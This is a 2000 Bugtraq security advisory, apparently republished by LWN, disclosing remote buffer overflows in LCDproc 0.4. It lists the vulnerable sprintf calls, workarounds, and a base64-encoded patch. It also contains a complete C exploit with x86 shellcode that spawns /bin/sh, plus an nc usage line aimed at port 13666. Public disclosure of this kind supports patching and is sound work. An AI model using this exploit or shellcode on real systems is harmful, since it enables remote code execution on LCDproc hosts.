![[LWN Logo]](/images/lwn.banner.gif)
Date: Fri, 21 Apr 2000 01:12:18 -0400
From: Andrew Hobgood <chaos@STRANGE.NET>
Subject: Remote vulnerability in LCDproc 0.4
To: BUGTRAQ@SECURITYFOCUS.COM
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
--3582794174-877119450-956293861=:15318
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID: <Pine.LNX.3.96.1000421011113.15318L@schizo.strange.net>
-----BEGIN PGP SIGNED MESSAGE-----
==============================================================
=== Title: Vulnerability in LCDproc ===
=== Date: 20 April 2000 ===
=== Author: Andrew Hobgood <chaos@strange.net> ===
==============================================================
[ Note: The LCDproc maintainers have been notified of this vulnerability, ]
[ and have stated that they are prepared for this advisory to be ]
[ released. ]
=================
=== Specifics ===
=================
LCDproc (http://lcdproc.omnipotent.net) is a system to display system
information and other data on an LCD display (or any supported display
device, including curses or text). As of version 0.4, the system utilizes
a client/server model for communication, and clients wishing to display
data on the LCDproc host device can connect to the LCDproc server and
negotiate a session.
This system is commonly used in embedded server environments and other
locations where system statistics must be available quickly, but space
requirements or other restrictions prevent connecting a monitor or other
display unit. Also, since it must often communicate with the LCD device,
it is commonly installed setuid root or setgid uucp.
While this system provides for a highly extensible means of displaying
data, the protocol handling code has a few bugs with dire consequences.
The vulnerabilities in LCDproc allow an attacker to remotely execute
arbitrary code or cause the LCDproc server to crash.
Improper boundary conditions exist at various locations in the code,
including:
[ Note: argv[0] in this context is *not* the argv[] from main(). ]
parse.c:149: sprintf(errmsg, "huh? Invalid command \"%s\"\n", argv[0]);
screenlist.c:119: sprintf(str, "ignore %s\n", old_s->id);
screenlist.c:134: sprintf(str, "listen %s\n", s->id);
As well as other locations.
==============
=== Impact ===
==============
Any system running LCDproc 0.4 or above (including the 0.4-pre series) that
is susceptible to buffer overflow attacks is vulnerable. The exploit below
is only for Linux/x86, and has limited attack potential, but that does not
mean that the scope of the attack is limited only to that platform.
Remote access can be gained as whatever user and group that LCDproc is
running as.
==========================
=== Temporary Solution ===
==========================
Disable LCDproc, or downgrade to version 0.3 or before, prior to the client/
server implementation in 0.4.
There is also a patch included in this message which can be applied against
LCDproc version 0.4-pre9 (available from the LCDproc home site at
http://lcdproc.omnipotent.net).
================================
=== Patch (against 0.4-pre9) ===
================================
[ This patch is also available at ]
[ http://web.strange.net/patches/lcdproc.20April2000.patch ]
(Patch has been attached to this message to prevent linewrapping and other
such confusions.)
===============
=== Exploit ===
===============
[ Note: This code launches /bin/sh on the remote site. Unfortunately, this ]
[ shell is execve()'ed, and inherits the stdin/stdout of the main ]
[ LCDproc process, and therefore just runs /bin/sh on the remote ]
[ site, instead of over the socket. Blah. I didn't feel like ]
[ hacking up shellcode to do something more productive. I'm sure ]
[ that someone else much more capable than myself will take care of ]
[ that on my behalf. ]
/*****
* lcdproc-exploit.c
*****
*
* LCDproc 0.4-pre9 exploit
#
# Andrew Hobgood <chaos@strange.net>
* Kha0S on #LinuxOS/EFnet
*
* Tested on Linux/x86 2.2.5-15smp (the only Intel box I could get my hands
* on for testing).
*
*****
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#define BUFFERSIZE 269
#define NOP 0x90
#define OFFSET 0xbffff750
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
"\xff\xff/bin/sh";
int main(int argc, char **argv) {
char *ptr, buffer[BUFFERSIZE];
unsigned long *long_ptr, offset = OFFSET;
int aux;
fprintf(stderr, "LCDproc exploit by Andrew Hobgood <chaos@strange.net>\n\n");
fprintf(stderr, "Usage: (%s [<offset>]; cat) | nc <target> 13666\n\n", argv[0]);
if (argc == 2) offset += atol(argv[1]);
ptr = buffer;
memset(ptr, 0, sizeof(buffer));
memset(ptr, NOP, sizeof(buffer) - strlen(shellcode) - 16);
ptr += sizeof(buffer) - strlen(shellcode) - 16;
memcpy(ptr, shellcode, strlen(shellcode));
ptr += strlen(shellcode);
long_ptr = (unsigned long *) ptr;
for(aux=0; aux<4; aux++) *(long_ptr++) = offset;
ptr = (char *) long_ptr;
*ptr = '\0';
fprintf(stderr, "Buffer size: %d\n", (int) strlen(buffer));
fprintf(stderr, "Offset: 0x%lx\n\n", offset);
printf("hello\n");
fflush(stdout);
sleep(1);
printf("screen_add {%s}\n", buffer);
fflush(stdout);
return(0);
}
/*** end lcdproc-exploit.c ***/
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv
iQCVAwUBOP/jNrVO5F5M77LBAQEW8wQAh9dJRKmc+V/M6K+4a+LK5Har+QiNuaaF
IlIQEeMDa/LrmbdZJHMBCjpYSFahGF/1ihBzb0yU2juYlIVLZjD0jo3B8gkQh5mk
wWa+18rwNmD8O4H7y/FFqBTWqTDdqpDWiVR3OB4vI0yMiOM7r09TupVTfyzP3z6h
QvwIasYme/0=
=R713
-----END PGP SIGNATURE-----
--3582794174-877119450-956293861=:15318
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="lcdproc.patch"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.3.96.1000421011101.15318J@schizo.strange.net>
Content-Description: lcdproc.patch
ZGlmZiAtdXIgLi9XSEFUU05FVyAuLi9sY2Rwcm9jLWhhY2tlZC9XSEFUU05F
Vw0KLS0tIC4vV0hBVFNORVcJVGh1IE9jdCAyMSAyMDowNDo1OSAxOTk5DQor
KysgLi4vbGNkcHJvYy1oYWNrZWQvV0hBVFNORVcJVGh1IEFwciAyMCAxMzo1
Mzo1NCAyMDAwDQpAQCAtMTEsNiArMTEsMTEgQEANCiAgKiBCZXR0ZXIgc3lu
dGF4IGZvciBkcml2ZXIgcGFyYW1ldGVycw0KICAqIER5bmFtaWNhbGx5LWxv
YWRlZCBkcml2ZXIgc3lzdGVtDQogDQorPj4gUGF0Y2hlZCBmb3IgYnVncyBh
cyBmb2xsb3dzIGJ5IEFuZHJldyBIb2Jnb29kIDxjaGFvc0BzdHJhbmdlLm5l
dD46DQorICogVGhyZWUgYnVmZmVyIG92ZXJmbG93cyBpbiB2YXJpb3VzIGxv
Y2F0aW9ucyBbc2NyZWVubGlzdC5jLCBwYXJzZS5jLCBvdGhlcnNdDQorICog
UHJldmVudCB0b28gbWFueSBhcmd1bWVudHMgZnJvbSB3YWxraW5nIG92ZXIg
dGhlIGJvdW5kYXJ5IG9mIHRoZSBmaXhlZA0KKyAgIGNsaWVudF9mdW5jIGFy
Z3YuDQorDQogVjAuNC1wcmU5Og0KICAqIHNtYWxsIGZpeGVzIGZvciBpcml4
DQogICogQWRkZWQgZmxhZyBpbiBMQ0RkIHRvIHNodXQgb2ZmIHNlcnZlciBz
Y3JlZW46ICANCmRpZmYgLXVyIC4vc2VydmVyL2NsaWVudF9mdW5jdGlvbnMu
YyAuLi9sY2Rwcm9jLWhhY2tlZC9zZXJ2ZXIvY2xpZW50X2Z1bmN0aW9ucy5j
DQotLS0gLi9zZXJ2ZXIvY2xpZW50X2Z1bmN0aW9ucy5jCVRodSBPY3QgMjEg
MTg6MTQ6MjEgMTk5OQ0KKysrIC4uL2xjZHByb2MtaGFja2VkL3NlcnZlci9j
bGllbnRfZnVuY3Rpb25zLmMJVGh1IEFwciAyMCAxNDoxMjo0MiAyMDAwDQpA
QCAtNjgsNyArNjgsNyBAQA0KICAgIA0KICAgIGZvcihpPTA7IGk8YXJnYzsg
aSsrKQ0KICAgIHsNCi0gICAgICBzcHJpbnRmKHN0ciwgInRlc3RfZnVuY19m
dW5jOiAgJWkgLT4gJXNcbiIsIGksIGFyZ3ZbaV0pOw0KKyAgICAgIHNucHJp
bnRmKHN0ciwgMjU2LCAidGVzdF9mdW5jX2Z1bmM6ICAlaSAtPiAlc1xuIiwg
aSwgYXJndltpXSk7DQogICAgICAgcHJpbnRmKHN0cik7DQogICAgICAgc29j
a19zZW5kX3N0cmluZyhjLT5zb2NrLCBzdHIpOw0KICAgIH0NCkBAIC04OSw3
ICs4OSw3IEBADQogICAgDQogICAgZGVidWcoIkhlbGxvIVxuIik7DQogDQot
ICAgc3ByaW50ZihzdHIsDQorICAgc25wcmludGYoc3RyLCAyNTYsDQogCSAg
ICJjb25uZWN0IExDRHByb2MgJXMgbGNkIHdpZCAlaSBoZ3QgJWkgY2VsbHdp
ZCAlaSBjZWxsaGd0ICVpXG4iLA0KIAkgICB2ZXJzaW9uLCBsY2Qud2lkLCBs
Y2QuaGd0LCBsY2QuY2VsbHdpZCwgbGNkLmNlbGxoZ3QpOw0KICAgIHNvY2tf
c2VuZF9zdHJpbmcoYy0+c29jaywgc3RyKTsNCkBAIC0xOTMsNiArMTkzLDkg
QEANCiAgICB9DQogDQogDQorICAgLy8gdHJ1bmNhdGUgYXJndlsxXSBzbyB0
aGF0IGl0IGNhbid0IGJlIHVzZWQgbGF0ZXIgdG8gb3ZlcmZsb3cgYW55DQor
ICAgLy8gYnVmZmVycy4JCQkJQW5kcmV3IEhvYmdvb2QgPGNoYW9zQHN0cmFu
Z2UubmV0Pg0KKyAgIGFyZ3ZbMV1bMTI4XSA9IDA7DQogICAgZGVidWcoInNj
cmVlbl9hZGQ6IEFkZGluZyBzY3JlZW4gJXNcbiIsIGFyZ3ZbMV0pOw0KICAg
IGVyciA9IHNjcmVlbl9hZGQoYywgYXJndlsxXSk7DQogICAgaWYoZXJyIDwg
MCkNCmRpZmYgLXVyIC4vc2VydmVyL3BhcnNlLmMgLi4vbGNkcHJvYy1oYWNr
ZWQvc2VydmVyL3BhcnNlLmMNCi0tLSAuL3NlcnZlci9wYXJzZS5jCVNhdCBG
ZWIgMjAgMjA6NTM6MjMgMTk5OQ0KKysrIC4uL2xjZHByb2MtaGFja2VkL3Nl
cnZlci9wYXJzZS5jCVRodSBBcHIgMjAgMTQ6MDY6NTIgMjAwMA0KQEAgLTkz
LDEyICs5MywyMSBAQA0KIAkgICAgICAgaWYobmV3dG9rZW4gJiYgc3RyW2ld
KQ0KIAkgICAgICAgew0KIAkJICBuZXd0b2tlbj0wOw0KLQkJICBhcmd2W2Fy
Z2NdID0gc3RyICsgaTsNCi0JCSAgYXJnYysrOw0KLQkgICAgICAgfQ0KLQkg
ICAgICAgZWxzZQ0KLQkgICAgICAgew0KLQkgICAgICAgfQ0KKwkJICAvLyBt
YWtlIHN1cmUgdGhhdCB3ZSdyZSBub3QgZ29pbmcgdG8gZ28gb3ZlciB0aGUg
Zml4ZWQgDQorCQkgIC8vIG51bWJlciBvZiBhbGxvd2VkIGFyZ3VtZW50cyBp
biBhcmd2DQorCQkgIC8vIAkJCUFuZHJldyBIb2Jnb29kIDxjaGFvc0BzdHJh
bmdlLm5ldD4NCisJCSAgaWYoYXJnYyA8IDI1NSkgDQorCQkgIHsNCisJCSAg
ICBhcmd2W2FyZ2NdID0gc3RyICsgaTsNCisJCSAgICBhcmdjKys7DQorCQkg
IH0gZWxzZSANCisJCSAgew0KKwkgICAgICAgICAgICBkZWJ1ZygiVG9vIG1h
bnkgYXJndW1lbnRzLCBpZ25vcmluZyBwYXN0IDI1Ni5cbiIpOw0KKwkJICB9
DQorCQl9DQorCSAgICAgICAgZWxzZQ0KKwkJew0KKwkJfQ0KIAkgICAgfQ0K
IAkgICAgaWYoaW5xdW90ZSkNCiAJICAgIHsNCkBAIC0xMzUsNyArMTQ0LDkg
QEANCiAJICAgIGlmKGludmFsaWQpDQogCSAgICB7DQogCSAgICAgICAvLyBG
SVhNRTogIENoZWNrIGZvciBidWZmZXIgb3ZlcmZsb3dzIGhlcmUuLi4NCi0J
ICAgICAgIHNwcmludGYoZXJybXNnLCAiaHVoPyBJbnZhbGlkIGNvbW1hbmQg
XCIlc1wiXG4iLCBhcmd2WzBdKTsNCisJICAgICAgIC8vIFlvdSB3ZXJlIHJp
Z2h0IC0tIHRoZXJlIHdhcyBvbmUgaGVyZS4gPSkgIE1vcmUgb3IgbGVzcyAN
CisJICAgICAgIC8vIGZpeGVkOiAJCUFuZHJldyBIb2Jnb29kIDxjaGFvc0Bz
dHJhbmdlLm5ldD4NCisJICAgICAgIHNucHJpbnRmKGVycm1zZywgMjU2LCAi
aHVoPyBJbnZhbGlkIGNvbW1hbmQgXCIlc1wiXG4iLCBhcmd2WzBdKTsNCiAJ
ICAgICAgIHNvY2tfc2VuZF9zdHJpbmcoYy0+c29jaywgZXJybXNnKTsNCiAJ
ICAgIH0NCiANCmRpZmYgLXVyIC4vc2VydmVyL3NjcmVlbmxpc3QuYyAuLi9s
Y2Rwcm9jLWhhY2tlZC9zZXJ2ZXIvc2NyZWVubGlzdC5jDQotLS0gLi9zZXJ2
ZXIvc2NyZWVubGlzdC5jCUZyaSBNYXIgMTIgMDA6MjA6MzkgMTk5OQ0KKysr
IC4uL2xjZHByb2MtaGFja2VkL3NlcnZlci9zY3JlZW5saXN0LmMJVGh1IEFw
ciAyMCAxNDowOTowMyAyMDAwDQpAQCAtMTE2LDcgKzExNiw3IEBADQogCSAg
ICBjID0gb2xkX3MtPnBhcmVudDsNCiAJICAgIGlmKGMpICAvLyBUZWxsIHRo
ZSBjbGllbnQgd2UncmUgbm90IGxpc3RlbmluZyBhbnkgbW9yZS4uLg0KIAkg
ICAgew0KLQkgICAgICAgc3ByaW50ZihzdHIsICJpZ25vcmUgJXNcbiIsIG9s
ZF9zLT5pZCk7DQorCSAgICAgICBzbnByaW50ZihzdHIsIDI1NiwgImlnbm9y
ZSAlc1xuIiwgb2xkX3MtPmlkKTsNCiAJICAgICAgIHNvY2tfc2VuZF9zdHJp
bmcoYy0+c29jaywgc3RyKTsNCiAJICAgIH0NCiAJICAgIGVsc2UgIC8vIFRo
ZSBzZXJ2ZXIgaGFzIHRoZSBkaXNwbGF5LCBzbyBkbyBub3RoaW5nDQpAQCAt
MTMxLDcgKzEzMSw3IEBADQogCSBjID0gcy0+cGFyZW50Ow0KIAkgaWYoYykg
IC8vIFRlbGwgdGhlIGNsaWVudCB3ZSdyZSBwYXlpbmcgYXR0ZW50aW9uLi4u
DQogCSB7DQotCSAgICBzcHJpbnRmKHN0ciwgImxpc3RlbiAlc1xuIiwgcy0+
aWQpOw0KKwkgICAgc25wcmludGYoc3RyLCAyNTYsICJsaXN0ZW4gJXNcbiIs
IHMtPmlkKTsNCiAJICAgIHNvY2tfc2VuZF9zdHJpbmcoYy0+c29jaywgc3Ry
KTsNCiAJIH0NCiAJIGVsc2UgIC8vIFRoZSBzZXJ2ZXIgaGFzIHRoZSBkaXNw
bGF5LCBzbyBkbyBub3RoaW5nDQo=
--3582794174-877119450-956293861=:15318--